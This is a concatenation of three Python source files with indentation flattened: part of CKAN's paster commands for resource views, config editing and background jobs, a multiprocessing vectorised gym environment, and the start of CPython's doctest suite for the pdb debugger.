super(ViewsCommand, self).__init__(name)
self.parser.add_option('-y', '--yes', dest='assume_yes',
action='store_true',
default=False,
help='''Automatic yes to prompts. Assume "yes"
as answer to all prompts and run non-interactively''')
self.parser.add_option('-d', '--dataset', dest='dataset_id',
action='append',
help='''Create views on a particular dataset.
You can use the dataset id or name, and it can be defined multiple times.''')
self.parser.add_option('--no-default-filters',
dest='no_default_filters',
action='store_true',
default=False,
help='''Do not add default filters for relevant
resource formats for the view types provided. Note that filters are not added
by default anyway if an unsupported view type is provided or when using the
`-s` or `-d` options.''')
self.parser.add_option('-s', '--search', dest='search_params',
action='store',
default=False,
help='''Extra search parameters that will be
used for getting the datasets to create the resource views on. It must be a
JSON object like the one used by the `package_search` API call. Supported
fields are `q`, `fq` and `fq_list`. Check the documentation for examples.
Not used when using the `-d` option.''')
def command(self):
self._load_config()
if not self.args:
print self.usage
elif self.args[0] == 'create':
view_plugin_types = self.args[1:]
self.create_views(view_plugin_types)
elif self.args[0] == 'clear':
view_plugin_types = self.args[1:]
self.clear_views(view_plugin_types)
elif self.args[0] == 'clean':
self.clean_views()
else:
print self.usage
_page_size = 100
def _get_view_plugins(self, view_plugin_types,
get_datastore_views=False):
'''
Returns the view plugins that were succesfully loaded
Views are provided as a list of ``view_plugin_types``. If no types are
provided, the default views defined in the ``ckan.views.default_views``
will be created. Only in this case (when the default view plugins are
used) the `get_datastore_views` parameter can be used to get also view
plugins that require data to be in the DataStore.
If any of the provided plugins could not be loaded (eg it was not added
to `ckan.plugins`) the command will stop.
Returns a list of loaded plugin names.
'''
from ckan.lib.datapreview import (get_view_plugins,
get_default_view_plugins
)
log = logging.getLogger(__name__)
view_plugins = []
if not view_plugin_types:
log.info('No view types provided, using default types')
view_plugins = get_default_view_plugins()
if get_datastore_views:
view_plugins.extend(
get_default_view_plugins(get_datastore_views=True))
else:
view_plugins = get_view_plugins(view_plugin_types)
loaded_view_plugins = [view_plugin.info()['name']
for view_plugin in view_plugins]
plugins_not_found = list(set(view_plugin_types) -
set(loaded_view_plugins))
if plugins_not_found:
error('View plugin(s) not found : {0}. '.format(plugins_not_found)
+ 'Have they been added to the `ckan.plugins` configuration'
+ ' option?')
return loaded_view_plugins
def _add_default_filters(self, search_data_dict, view_types):
'''
Adds extra filters to the `package_search` dict for common view types
It basically adds `fq` parameters that filter relevant resource formats
for the view types provided. For instance, if one of the view types is
`pdf_view` the following will be added to the final query:
fq=res_format:"pdf" OR res_format:"PDF"
This obviously should only be used if all view types are known and can
be filtered, otherwise we want all datasets to be returned. If a
non-filterable view type is provided, the search params are not
modified.
Returns the provided data_dict for `package_search`, optionally
modified with extra filters.
'''
from ckanext.imageview.plugin import DEFAULT_IMAGE_FORMATS
from ckanext.textview.plugin import get_formats as get_text_formats
from ckanext.datapusher.plugin import DEFAULT_FORMATS as \
datapusher_formats
filter_formats = []
for view_type in view_types:
if view_type == 'image_view':
for _format in DEFAULT_IMAGE_FORMATS:
filter_formats.extend([_format, _format.upper()])
elif view_type == 'text_view':
formats = get_text_formats(config)
for _format in itertools.chain.from_iterable(formats.values()):
filter_formats.extend([_format, _format.upper()])
elif view_type == 'pdf_view':
filter_formats.extend(['pdf', 'PDF'])
elif view_type in ['recline_view', 'recline_grid_view',
'recline_graph_view', 'recline_map_view']:
if datapusher_formats[0] in filter_formats:
continue
for _format in datapusher_formats:
if '/' not in _format:
filter_formats.extend([_format, _format.upper()])
else:
# There is another view type provided so we can't add any
# filter
return search_data_dict
filter_formats_query = ['+res_format:"{0}"'.format(_format)
for _format in filter_formats]
search_data_dict['fq_list'].append(' OR '.join(filter_formats_query))
return search_data_dict
def _update_search_params(self, search_data_dict):
'''
Update the `package_search` data dict with the user provided parameters
Supported fields are `q`, `fq` and `fq_list`.
If the provided JSON object can not be parsed the process stops with
an error.
Returns the updated data dict
'''
log = logging.getLogger(__name__)
if not self.options.search_params:
return search_data_dict
try:
user_search_params = json.loads(self.options.search_params)
except ValueError, e:
error('Unable to parse JSON search parameters: {0}'.format(e))
if user_search_params.get('q'):
search_data_dict['q'] = user_search_params['q']
if user_search_params.get('fq'):
if search_data_dict['fq']:
search_data_dict['fq'] += ' ' + user_search_params['fq']
else:
search_data_dict['fq'] = user_search_params['fq']
if (user_search_params.get('fq_list') and
isinstance(user_search_params['fq_list'], list)):
search_data_dict['fq_list'].extend(user_search_params['fq_list'])
def _search_datasets(self, page=1, view_types=[]):
'''
Perform a query with `package_search` and return the result
Results can be paginated using the `page` parameter
'''
n = self._page_size
search_data_dict = {
'q': '',
'fq': '',
'fq_list': [],
'include_private': True,
'rows': n,
'start': n * (page - 1),
}
if self.options.dataset_id:
search_data_dict['q'] = ' OR '.join(
['id:{0} OR name:"{0}"'.format(dataset_id)
for dataset_id in self.options.dataset_id]
)
elif self.options.search_params:
self._update_search_params(search_data_dict)
elif not self.options.no_default_filters:
self._add_default_filters(search_data_dict, view_types)
if not search_data_dict.get('q'):
search_data_dict['q'] = '*:*'
query = p.toolkit.get_action('package_search')(
{}, search_data_dict)
return query
def create_views(self, view_plugin_types=[]):
from ckan.lib.datapreview import add_views_to_dataset_resources
log = logging.getLogger(__name__)
datastore_enabled = 'datastore' in config['ckan.plugins'].split()
loaded_view_plugins = self._get_view_plugins(view_plugin_types,
datastore_enabled)
context = {'user': self.site_user['name']}
page = 1
while True:
query = self._search_datasets(page, loaded_view_plugins)
if page == 1 and query['count'] == 0:
error('No datasets to create resource views on, exiting...')
elif page == 1 and not self.options.assume_yes:
msg = ('\nYou are about to check {0} datasets for the ' +
'following view plugins: {1}\n' +
' Do you want to continue?')
confirm = query_yes_no(msg.format(query['count'],
loaded_view_plugins))
if confirm == 'no':
error('Command aborted by user')
if query['results']:
for dataset_dict in query['results']:
if not dataset_dict.get('resources'):
continue
views = add_views_to_dataset_resources(
context,
dataset_dict,
view_types=loaded_view_plugins)
if views:
view_types = list(set([view['view_type']
for view in views]))
msg = ('Added {0} view(s) of type(s) {1} to ' +
'resources from dataset {2}')
log.debug(msg.format(len(views),
', '.join(view_types),
dataset_dict['name']))
if len(query['results']) < self._page_size:
break
page += 1
else:
break
log.info('Done')
def clear_views(self, view_plugin_types=[]):
log = logging.getLogger(__name__)
if not self.options.assume_yes:
if view_plugin_types:
msg = 'Are you sure you want to delete all resource views ' + \
'of type {0}?'.format(', '.join(view_plugin_types))
else:
msg = 'Are you sure you want to delete all resource views?'
result = query_yes_no(msg, default='no')
if result == 'no':
error('Command aborted by user')
context = {'user': self.site_user['name']}
logic.get_action('resource_view_clear')(
context, {'view_types': view_plugin_types})
log.info('Done')
def clean_views(self):
names = []
for plugin in p.PluginImplementations(p.IResourceView):
names.append(str(plugin.info()['name']))
results = model.ResourceView.get_count_not_in_view_types(names)
if not results:
print 'No resource views to delete'
return
print 'This command will delete.\n'
for row in results:
print '%s of type %s' % (row[1], row[0])
result = query_yes_no('Do you want to delete these resource views:', default='no')
if result == 'no':
print 'Not Deleting.'
return
model.ResourceView.delete_not_in_view_types(names)
model.Session.commit()
print 'Deleted resource views.'
class ConfigToolCommand(paste.script.command.Command):
'''Tool for editing options in a CKAN config file
paster config-tool <default.ini> <key>=<value> [<key>=<value> ...]
paster config-tool <default.ini> -f <custom_options.ini>
Examples:
paster config-tool default.ini sqlalchemy.url=123 'ckan.site_title=ABC'
paster config-tool default.ini -s server:main -e port=8080
paster config-tool default.ini -f custom_options.ini
'''
parser = paste.script.command.Command.standard_parser(verbose=True)
default_verbosity = 1
group_name = 'ckan'
usage = __doc__
summary = usage.split('\n')[0]
parser.add_option('-s', '--section', dest='section',
default='app:main', help='Section of the config file')
parser.add_option(
'-e', '--edit', action='store_true', dest='edit', default=False,
help='Checks the option already exists in the config file')
parser.add_option(
'-f', '--file', dest='merge_filepath', metavar='FILE',
help='Supply an options file to merge in')
def command(self):
import config_tool
if len(self.args) < 1:
self.parser.error('Not enough arguments (got %i, need at least 1)'
% len(self.args))
config_filepath = self.args[0]
if not os.path.exists(config_filepath):
self.parser.error('Config filename %r does not exist.' %
config_filepath)
if self.options.merge_filepath:
config_tool.config_edit_using_merge_file(
config_filepath, self.options.merge_filepath)
options = self.args[1:]
if not (options or self.options.merge_filepath):
self.parser.error('No options provided')
if options:
for option in options:
if '=' not in option:
error(
'An option does not have an equals sign: %r '
'It should be \'key=value\'. If there are spaces '
'you\'ll need to quote the option.\n' % option)
try:
config_tool.config_edit_using_option_strings(
config_filepath, options, self.options.section,
edit=self.options.edit)
except config_tool.ConfigToolError, e:
error(traceback.format_exc())
class JobsCommand(CkanCommand):
'''Manage background jobs
Usage:
paster jobs worker [--burst] [QUEUES]
Start a worker that fetches jobs from queues and executes
them. If no queue names are given then the worker listens
to the default queue, this is equivalent to
paster jobs worker default
If queue names are given then the worker listens to those
queues and only those:
paster jobs worker my-custom-queue
Hence, if you want the worker to listen to the default queue
and some others then you must list the default queue explicitly:
paster jobs worker default my-custom-queue
If the `--burst` option is given then the worker will exit
as soon as all its queues are empty.
paster jobs list [QUEUES]
List currently enqueued jobs from the given queues. If no queue
names are given then the jobs from all queues are listed.
paster jobs show ID
Show details about a specific job.
paster jobs cancel ID
Cancel a specific job. Jobs can only be canceled while they are
enqueued. Once a worker has started executing a job it cannot
be aborted anymore.
paster jobs clear [QUEUES]
Cancel all jobs on the given queues. If no queue names are
given then ALL queues are cleared.
paster jobs test [QUEUES]
Enqueue a test job. If no queue names are given then the job is
added to the default queue. If queue names are given then a
separate test job is added to each of the queues.
'''
summary = __doc__.split(u'\n')[0]
usage = __doc__
min_args = 0
def __init__(self, *args, **kwargs):
super(JobsCommand, self).__init__(*args, **kwargs)
try:
self.parser.add_option(u'--burst', action='store_true',
default=False,
help=u'Start worker in burst mode.')
except OptionConflictError:
# Option has already been added in previous call
pass
def command(self):
self._load_config()
try:
cmd = self.args.pop(0)
except IndexError:
print(self.__doc__)
sys.exit(0)
if cmd == u'worker':
self.worker()
elif cmd == u'list':
self.list()
elif cmd == u'show':
self.show()
elif cmd == u'cancel':
self.cancel()
elif cmd == u'clear':
self.clear()
elif cmd == u'test':
self.test()
else:
error(u'Unknown command "{}"'.format(cmd))
def worker(self):
from ckan.lib.jobs import Worker
Worker(self.args).work(burst=self.options.burst)
def list(self):
data_dict = {
u'queues': self.args,
}
jobs = p.toolkit.get_action(u'job_list')({}, data_dict)
for job in jobs:
if job[u'title'] is None:
job[u'title'] = ''
else:
job[u'title'] = u'"{}"'.format(job[u'title'])
print(u'{created} {id} {queue} {title}'.format(**job))
def show(self):
if not self.args:
error(u'You must specify a job ID')
id = self.args[0]
try:
job = p.toolkit.get_action(u'job_show')({}, {u'id': id})
except logic.NotFound:
error(u'There is no job with ID "{}"'.format(id))
print(u'ID: {}'.format(job[u'id']))
if job[u'title'] is None:
title = u'None'
else:
title = u'"{}"'.format(job[u'title'])
print(u'Title: {}'.format(title))
print(u'Created: {}'.format(job[u'created']))
print(u'Queue: {}'.format(job[u'queue']))
def cancel(self):
if not self.args:
error(u'You must specify a job ID')
id = self.args[0]
try:
p.toolkit.get_action(u'job_cancel')({}, {u'id': id})
except logic.NotFound:
error(u'There is no job with ID "{}"'.format(id))
print(u'Cancelled job {}'.format(id))
def clear(self):
data_dict = {
u'queues': self.args,
}
queues = p.toolkit.get_action(u'job_clear')({}, data_dict)
queues = (u'"{}"'.format(q) for q in queues)
print(u'Cleared queue(s) {}'.format(u', '.join(queues)))
def test(self):
from ckan.lib.jobs import DEFAULT_QUEUE_NAME, enqueue, test_job
for queue in (self.args or [DEFAULT_QUEUE_NAME]):
job = enqueue(test_job, [u'A test job'], title=u'A test job', queue=queue)
print(u'Added test job {} to queue "{}"'.format(job.id, queue))
|
multiprocessing_env.py
|
import logging
import multiprocessing
import numpy as np
import traceback
import gym
from gym import spaces
from universe.vectorized import core
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
class Error(Exception):
pass
def display_name(exception):
prefix = ''
# AttributeError has no __module__; RuntimeError has module of
# exceptions
if hasattr(exception, '__module__') and exception.__module__ != 'exceptions':
prefix = exception.__module__ + '.'
return prefix + type(exception).__name__
def render_dict(error):
return {
'type': display_name(error),
'message': error.message,
'traceback': traceback.format_exc(error)
}
class Worker(object):
def __init__(self, env_m, worker_idx):
# These are instantiated in the *parent* process
# currently. Probably will want to change this. The parent
# does need to obtain the relevant Spaces at some stage, but
# that's doable.
self.worker_idx = worker_idx
self.env_m = env_m
self.m = len(env_m)
self.parent_conn, self.child_conn = multiprocessing.Pipe()
self.joiner = multiprocessing.Process(target=self.run)
self._clear_state()
self.start()
# Parent only!
self.child_conn.close()
def _clear_state(self):
self.mask = [True] * self.m
# Control methods
def start(self):
self.joiner.start()
def _parent_recv(self):
rendered, res = self.parent_conn.recv()
if rendered is not None:
raise Error('[Worker {}] Error: {} ({})\n\n{}'.format(self.worker_idx, rendered['message'], rendered['type'], rendered['traceback']))
return res
def _child_send(self, msg):
self.child_conn.send((None, msg))
def _parent_send(self, msg):
try:
self.parent_conn.send(msg)
except IOError: # the worker is now dead
try:
res = self._parent_recv()
except EOFError:
raise Error('[Worker {}] Child died unexpectedly'.format(self.worker_idx))
else:
raise Error('[Worker {}] Child returned unexpected result: {}'.format(self.worker_idx, res))
def close_start(self):
self._parent_send(('close', None))
def close_finish(self):
self.joiner.join()
def reset_start(self):
self._parent_send(('reset', None))
def reset_finish(self):
return self._parent_recv()
def step_start(self, action_m):
"""action_m: the batch of actions for this worker"""
self._parent_send(('step', action_m))
def step_finish(self):
return self._parent_recv()
def mask_start(self, i):
self._parent_send(('mask', i))
def seed_start(self, seed_m):
self._parent_send(('seed', seed_m))
def render_start(self, mode, close):
self._parent_send(('render', (mode, close)))
def render_finish(self):
return self._parent_recv()
def run(self):
try:
self.do_run()
except Exception as e:
rendered = render_dict(e)
self.child_conn.send((rendered, None))
return
def do_run(self):
# Child only!
self.parent_conn.close()
while True:
method, body = self.child_conn.recv()
logger.debug('[%d] Received: method=%s body=%s', self.worker_idx, method, body)
if method == 'close':
logger.info('Closing envs')
# TODO: close envs?
return
elif method == 'reset':
self._clear_state()
observation_m = [env.reset() for env in self.env_m]
self._child_send(observation_m)
elif method == 'step':
action_m = body
observation_m, reward_m, done_m, info = self.step_m(action_m)
self._child_send((observation_m, reward_m, done_m, info))
elif method == 'mask':
i = body
assert 0 <= i < self.m, 'Bad value for mask: {} (should be >= 0 and < {})'.format(i, self.m)
self.mask[i] = False
logger.debug('[%d] Applying mask: i=%d', self.worker_idx, i)
elif method == 'seed':
seeds = body
[env.seed(seed) for env, seed in zip(self.env_m, seeds)]
elif method == 'render':
mode, close = body
if mode == 'human':
self.env_m[0].render(mode=mode, close=close)
result = [None]
else:
result = [env.render(mode=mode, close=close) for env in self.env_m]
self._child_send(result)
else:
raise Error('Bad method: {}'.format(method))
def step_m(self, action_m):
observation_m = []
reward_m = []
done_m = []
info = {'m': []}
for env, enabled, action in zip(self.env_m, self.mask, action_m):
if enabled:
observation, reward, done, info_i = env.step(action)
if done:
observation = env.reset()
else:
observation = None
reward = 0
done = False
info_i = {}
observation_m.append(observation)
reward_m.append(reward)
done_m.append(done)
info['m'].append(info_i)
return observation_m, reward_m, done_m, info
def step_n(worker_n, action_n):
accumulated = 0
for worker in worker_n:
action_m = action_n[accumulated:accumulated+worker.m]
worker.step_start(action_m)
accumulated += worker.m
observation_n = []
reward_n = []
done_n = []
info = {'n': []}
for worker in worker_n:
observation_m, reward_m, done_m, info_i = worker.step_finish()
observation_n += observation_m
reward_n += reward_m
done_n += done_m
info['n'] += info_i['m']
return observation_n, reward_n, done_n, info
def reset_n(worker_n):
for worker in worker_n:
worker.reset_start()
observation_n = []
for worker in worker_n:
observation_n += worker.reset_finish()
return observation_n
def seed_n(worker_n, seed_n):
accumulated = 0
for worker in worker_n:
action_m = seed_n[accumulated:accumulated+worker.m]
worker.seed_start(seed_n)
accumulated += worker.m
def mask(worker_n, i):
accumulated = 0
for k, worker in enumerate(worker_n):
if accumulated + worker.m <= i:
accumulated += worker.m
else:
worker.mask_start(i - accumulated)
return
def render_n(worker_n, mode, close):
if mode == 'human':
# Only render 1 worker
worker_n = worker_n[0:]
for worker in worker_n:
worker.render_start(mode, close)
res = []
for worker in worker_n:
res += worker.render_finish()
if mode != 'human':
return res
else:
return None
def close_n(worker_n):
if worker_n is None:
return
# TODO: better error handling: workers should die when we go away
# anyway. Also technically should wait for these processes if
# we're not crashing.
for worker in worker_n:
try:
worker.close_start()
except Error:
pass
# for worker in worker_n:
# try:
# worker.close_finish()
# except Error:
# pass
class MultiprocessingEnv(core.Env):
metadata = {
'runtime.vectorized': True,
}
def __init__(self, env_id):
self.worker_n = None
# Pull the relevant info from a transient env instance
self.spec = gym.spec(env_id)
env = self.spec.make()
current_metadata = self.metadata
self.metadata = env.metadata.copy()
self.metadata.update(current_metadata)
self.action_space = env.action_space
self.observation_space = env.observation_space
self.reward_range = env.reward_range
def _configure(self, n=1, pool_size=None, episode_limit=None):
super(MultiprocessingEnv, self)._configure()
self.n = n
self.envs = [self.spec.make() for _ in range(self.n)]
if pool_size is None:
pool_size = min(len(self.envs), multiprocessing.cpu_count() - 1)
pool_size = max(1, pool_size)
self.worker_n = []
m = int((self.n + pool_size - 1) / pool_size)
for i in range(0, self.n, m):
envs = self.envs[i:i+m]
self.worker_n.append(Worker(envs, i))
if episode_limit is not None:
self._episode_id.episode_limit = episode_limit
def _seed(self, seed):
seed_n(self.worker_n, seed)
return [[seed_i] for seed_i in seed]
def _reset(self):
return reset_n(self.worker_n)
def _step(self, action_n):
return step_n(self.worker_n, action_n)
def _render(self, mode='human', close=False):
return render_n(self.worker_n, mode=mode, close=close)
def mask(self, i):
mask(self.worker_n, i)
def _close(self):
close_n(self.worker_n)
if __name__ == '__main__':
env_n = make('Pong-v3')
env_n.configure()
env_n.reset()
print(env_n.step([0] * 10))
|
test_pdb.py
|
# A test suite for pdb; not very comprehensive at the moment.
import doctest
import os
import pdb
import sys
import types
import unittest
import subprocess
import textwrap
from contextlib import ExitStack
from io import StringIO
from test import support
# This little helper class is essential for testing pdb under doctest.
from test.test_doctest import _FakeInput
from unittest.mock import patch
class PdbTestInput(object):
"""Context manager that makes testing Pdb in doctests easier."""
def __init__(self, input):
self.input = input
def __enter__(self):
self.real_stdin = sys.stdin
sys.stdin = _FakeInput(self.input)
self.orig_trace = sys.gettrace() if hasattr(sys, 'gettrace') else None
def __exit__(self, *exc):
sys.stdin = self.real_stdin
if self.orig_trace:
sys.settrace(self.orig_trace)
def test_pdb_displayhook():
"""This tests the custom displayhook for pdb.
>>> def test_function(foo, bar):
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... pass
>>> with PdbTestInput([
... 'foo',
... 'bar',
... 'for i in range(5): print(i)',
... 'continue',
... ]):
... test_function(1, None)
> <doctest test.test_pdb.test_pdb_displayhook[0]>(3)test_function()
-> pass
(Pdb) foo
1
(Pdb) bar
(Pdb) for i in range(5): print(i)
0
1
2
3
4
(Pdb) continue
"""
def test_pdb_basic_commands():
"""Test the basic commands of pdb.
>>> def test_function_2(foo, bar='default'):
... print(foo)
... for i in range(5):
... print(i)
... print(bar)
... for i in range(10):
... never_executed
... print('after for')
... print('...')
... return foo.upper()
>>> def test_function3(arg=None, *, kwonly=None):
... pass
>>> def test_function4(a, b, c, /):
... pass
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... ret = test_function_2('baz')
... test_function3(kwonly=True)
... test_function4(1, 2, 3)
... print(ret)
>>> with PdbTestInput([ # doctest: +ELLIPSIS, +NORMALIZE_WHITESPACE
... 'step', # entering the function call
... 'args', # display function args
... 'list', # list function source
... 'bt', # display backtrace
... 'up', # step up to test_function()
... 'down', # step down to test_function_2() again
... 'next', # stepping to print(foo)
... 'next', # stepping to the for loop
... 'step', # stepping into the for loop
... 'until', # continuing until out of the for loop
... 'next', # executing the print(bar)
... 'jump 8', # jump over second for loop
... 'return', # return out of function
... 'retval', # display return value
... 'next', # step to test_function3()
... 'step', # stepping into test_function3()
... 'args', # display function args
... 'return', # return out of function
... 'next', # step to test_function4()
... 'step', # stepping to test_function4()
... 'args', # display function args
... 'continue',
... ]):
... test_function()
> <doctest test.test_pdb.test_pdb_basic_commands[3]>(3)test_function()
-> ret = test_function_2('baz')
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(1)test_function_2()
-> def test_function_2(foo, bar='default'):
(Pdb) args
foo = 'baz'
bar = 'default'
(Pdb) list
1 -> def test_function_2(foo, bar='default'):
2 print(foo)
3 for i in range(5):
4 print(i)
5 print(bar)
6 for i in range(10):
7 never_executed
8 print('after for')
9 print('...')
10 return foo.upper()
[EOF]
(Pdb) bt
...
<doctest test.test_pdb.test_pdb_basic_commands[4]>(25)<module>()
-> test_function()
<doctest test.test_pdb.test_pdb_basic_commands[3]>(3)test_function()
-> ret = test_function_2('baz')
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(1)test_function_2()
-> def test_function_2(foo, bar='default'):
(Pdb) up
> <doctest test.test_pdb.test_pdb_basic_commands[3]>(3)test_function()
-> ret = test_function_2('baz')
(Pdb) down
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(1)test_function_2()
-> def test_function_2(foo, bar='default'):
(Pdb) next
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(2)test_function_2()
-> print(foo)
(Pdb) next
baz
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(3)test_function_2()
-> for i in range(5):
(Pdb) step
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(4)test_function_2()
-> print(i)
(Pdb) until
0
1
2
3
4
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(5)test_function_2()
-> print(bar)
(Pdb) next
default
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(6)test_function_2()
-> for i in range(10):
(Pdb) jump 8
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(8)test_function_2()
-> print('after for')
(Pdb) return
after for
...
--Return--
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(10)test_function_2()->'BAZ'
-> return foo.upper()
(Pdb) retval
'BAZ'
(Pdb) next
> <doctest test.test_pdb.test_pdb_basic_commands[3]>(4)test_function()
-> test_function3(kwonly=True)
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_basic_commands[1]>(1)test_function3()
-> def test_function3(arg=None, *, kwonly=None):
(Pdb) args
arg = None
kwonly = True
(Pdb) return
--Return--
> <doctest test.test_pdb.test_pdb_basic_commands[1]>(2)test_function3()->None
-> pass
(Pdb) next
> <doctest test.test_pdb.test_pdb_basic_commands[3]>(5)test_function()
-> test_function4(1, 2, 3)
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_basic_commands[2]>(1)test_function4()
-> def test_function4(a, b, c, /):
(Pdb) args
a = 1
b = 2
c = 3
(Pdb) continue
BAZ
"""
def test_pdb_breakpoint_commands():
"""Test basic commands related to breakpoints.
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... print(1)
... print(2)
... print(3)
... print(4)
First, need to clear bdb state that might be left over from previous tests.
Otherwise, the new breakpoints might get assigned different numbers.
>>> from bdb import Breakpoint
>>> Breakpoint.next = 1
>>> Breakpoint.bplist = {}
>>> Breakpoint.bpbynumber = [None]
Now test the breakpoint commands. NORMALIZE_WHITESPACE is needed because
the breakpoint list outputs a tab for the "stop only" and "ignore next"
lines, which we don't want to put in here.
>>> with PdbTestInput([ # doctest: +NORMALIZE_WHITESPACE
... 'break 3',
... 'disable 1',
... 'ignore 1 10',
... 'condition 1 1 < 2',
... 'break 4',
... 'break 4',
... 'break',
... 'clear 3',
... 'break',
... 'condition 1',
... 'enable 1',
... 'clear 1',
... 'commands 2',
... 'p "42"',
... 'print("42", 7*6)', # Issue 18764 (not about breakpoints)
... 'end',
... 'continue', # will stop at breakpoint 2 (line 4)
... 'clear', # clear all!
... 'y',
... 'tbreak 5',
... 'continue', # will stop at temporary breakpoint
... 'break', # make sure breakpoint is gone
... 'continue',
... ]):
... test_function()
> <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>(3)test_function()
-> print(1)
(Pdb) break 3
Breakpoint 1 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
(Pdb) disable 1
Disabled breakpoint 1 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
(Pdb) ignore 1 10
Will ignore next 10 crossings of breakpoint 1.
(Pdb) condition 1 1 < 2
New condition set for breakpoint 1.
(Pdb) break 4
Breakpoint 2 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
(Pdb) break 4
Breakpoint 3 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
(Pdb) break
Num Type Disp Enb Where
1 breakpoint keep no at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
stop only if 1 < 2
ignore next 10 hits
2 breakpoint keep yes at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
3 breakpoint keep yes at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
(Pdb) clear 3
Deleted breakpoint 3 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
(Pdb) break
Num Type Disp Enb Where
1 breakpoint keep no at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
stop only if 1 < 2
ignore next 10 hits
2 breakpoint keep yes at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
(Pdb) condition 1
Breakpoint 1 is now unconditional.
(Pdb) enable 1
Enabled breakpoint 1 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
(Pdb) clear 1
Deleted breakpoint 1 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
(Pdb) commands 2
(com) p "42"
(com) print("42", 7*6)
(com) end
(Pdb) continue
1
'42'
42 42
> <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>(4)test_function()
-> print(2)
(Pdb) clear
Clear all breaks? y
Deleted breakpoint 2 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
(Pdb) tbreak 5
Breakpoint 4 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:5
(Pdb) continue
2
Deleted breakpoint 4 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:5
> <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>(5)test_function()
-> print(3)
(Pdb) break
(Pdb) continue
3
4
"""
def do_nothing():
pass
def do_something():
print(42)
def test_list_commands():
"""Test the list and source commands of pdb.
>>> def test_function_2(foo):
... import test.test_pdb
... test.test_pdb.do_nothing()
... 'some...'
... 'more...'
... 'code...'
... 'to...'
... 'make...'
... 'a...'
... 'long...'
... 'listing...'
... 'useful...'
... '...'
... '...'
... return foo
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... ret = test_function_2('baz')
>>> with PdbTestInput([ # doctest: +ELLIPSIS, +NORMALIZE_WHITESPACE
... 'list', # list first function
... 'step', # step into second function
... 'list', # list second function
... 'list', # continue listing to EOF
... 'list 1,3', # list specific lines
... 'list x', # invalid argument
... 'next', # step to import
... 'next', # step over import
... 'step', # step into do_nothing
... 'longlist', # list all lines
... 'source do_something', # list all lines of function
... 'source fooxxx', # something that doesn't exit
... 'continue',
... ]):
... test_function()
> <doctest test.test_pdb.test_list_commands[1]>(3)test_function()
-> ret = test_function_2('baz')
(Pdb) list
1 def test_function():
2 import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
3 -> ret = test_function_2('baz')
[EOF]
(Pdb) step
--Call--
> <doctest test.test_pdb.test_list_commands[0]>(1)test_function_2()
-> def test_function_2(foo):
(Pdb) list
1 -> def test_function_2(foo):
2 import test.test_pdb
3 test.test_pdb.do_nothing()
4 'some...'
5 'more...'
6 'code...'
7 'to...'
8 'make...'
9 'a...'
10 'long...'
11 'listing...'
(Pdb) list
12 'useful...'
13 '...'
14 '...'
15 return foo
[EOF]
(Pdb) list 1,3
1 -> def test_function_2(foo):
2 import test.test_pdb
3 test.test_pdb.do_nothing()
(Pdb) list x
*** ...
(Pdb) next
> <doctest test.test_pdb.test_list_commands[0]>(2)test_function_2()
-> import test.test_pdb
(Pdb) next
> <doctest test.test_pdb.test_list_commands[0]>(3)test_function_2()
-> test.test_pdb.do_nothing()
(Pdb) step
--Call--
> ...test_pdb.py(...)do_nothing()
-> def do_nothing():
(Pdb) longlist
... -> def do_nothing():
... pass
(Pdb) source do_something
... def do_something():
... print(42)
(Pdb) source fooxxx
*** ...
(Pdb) continue
"""
def test_post_mortem():
"""Test post mortem traceback debugging.
>>> def test_function_2():
... try:
... 1/0
... finally:
... print('Exception!')
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... test_function_2()
... print('Not reached.')
>>> with PdbTestInput([ # doctest: +ELLIPSIS, +NORMALIZE_WHITESPACE
... 'next', # step over exception-raising call
... 'bt', # get a backtrace
... 'list', # list code of test_function()
... 'down', # step into test_function_2()
... 'list', # list code of test_function_2()
... 'continue',
... ]):
... try:
... test_function()
... except ZeroDivisionError:
... print('Correctly reraised.')
> <doctest test.test_pdb.test_post_mortem[1]>(3)test_function()
-> test_function_2()
(Pdb) next
Exception!
ZeroDivisionError: division by zero
> <doctest test.test_pdb.test_post_mortem[1]>(3)test_function()
-> test_function_2()
(Pdb) bt
...
<doctest test.test_pdb.test_post_mortem[2]>(10)<module>()
-> test_function()
> <doctest test.test_pdb.test_post_mortem[1]>(3)test_function()
-> test_function_2()
<doctest test.test_pdb.test_post_mortem[0]>(3)test_function_2()
-> 1/0
(Pdb) list
1 def test_function():
2 import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
3 -> test_function_2()
4 print('Not reached.')
[EOF]
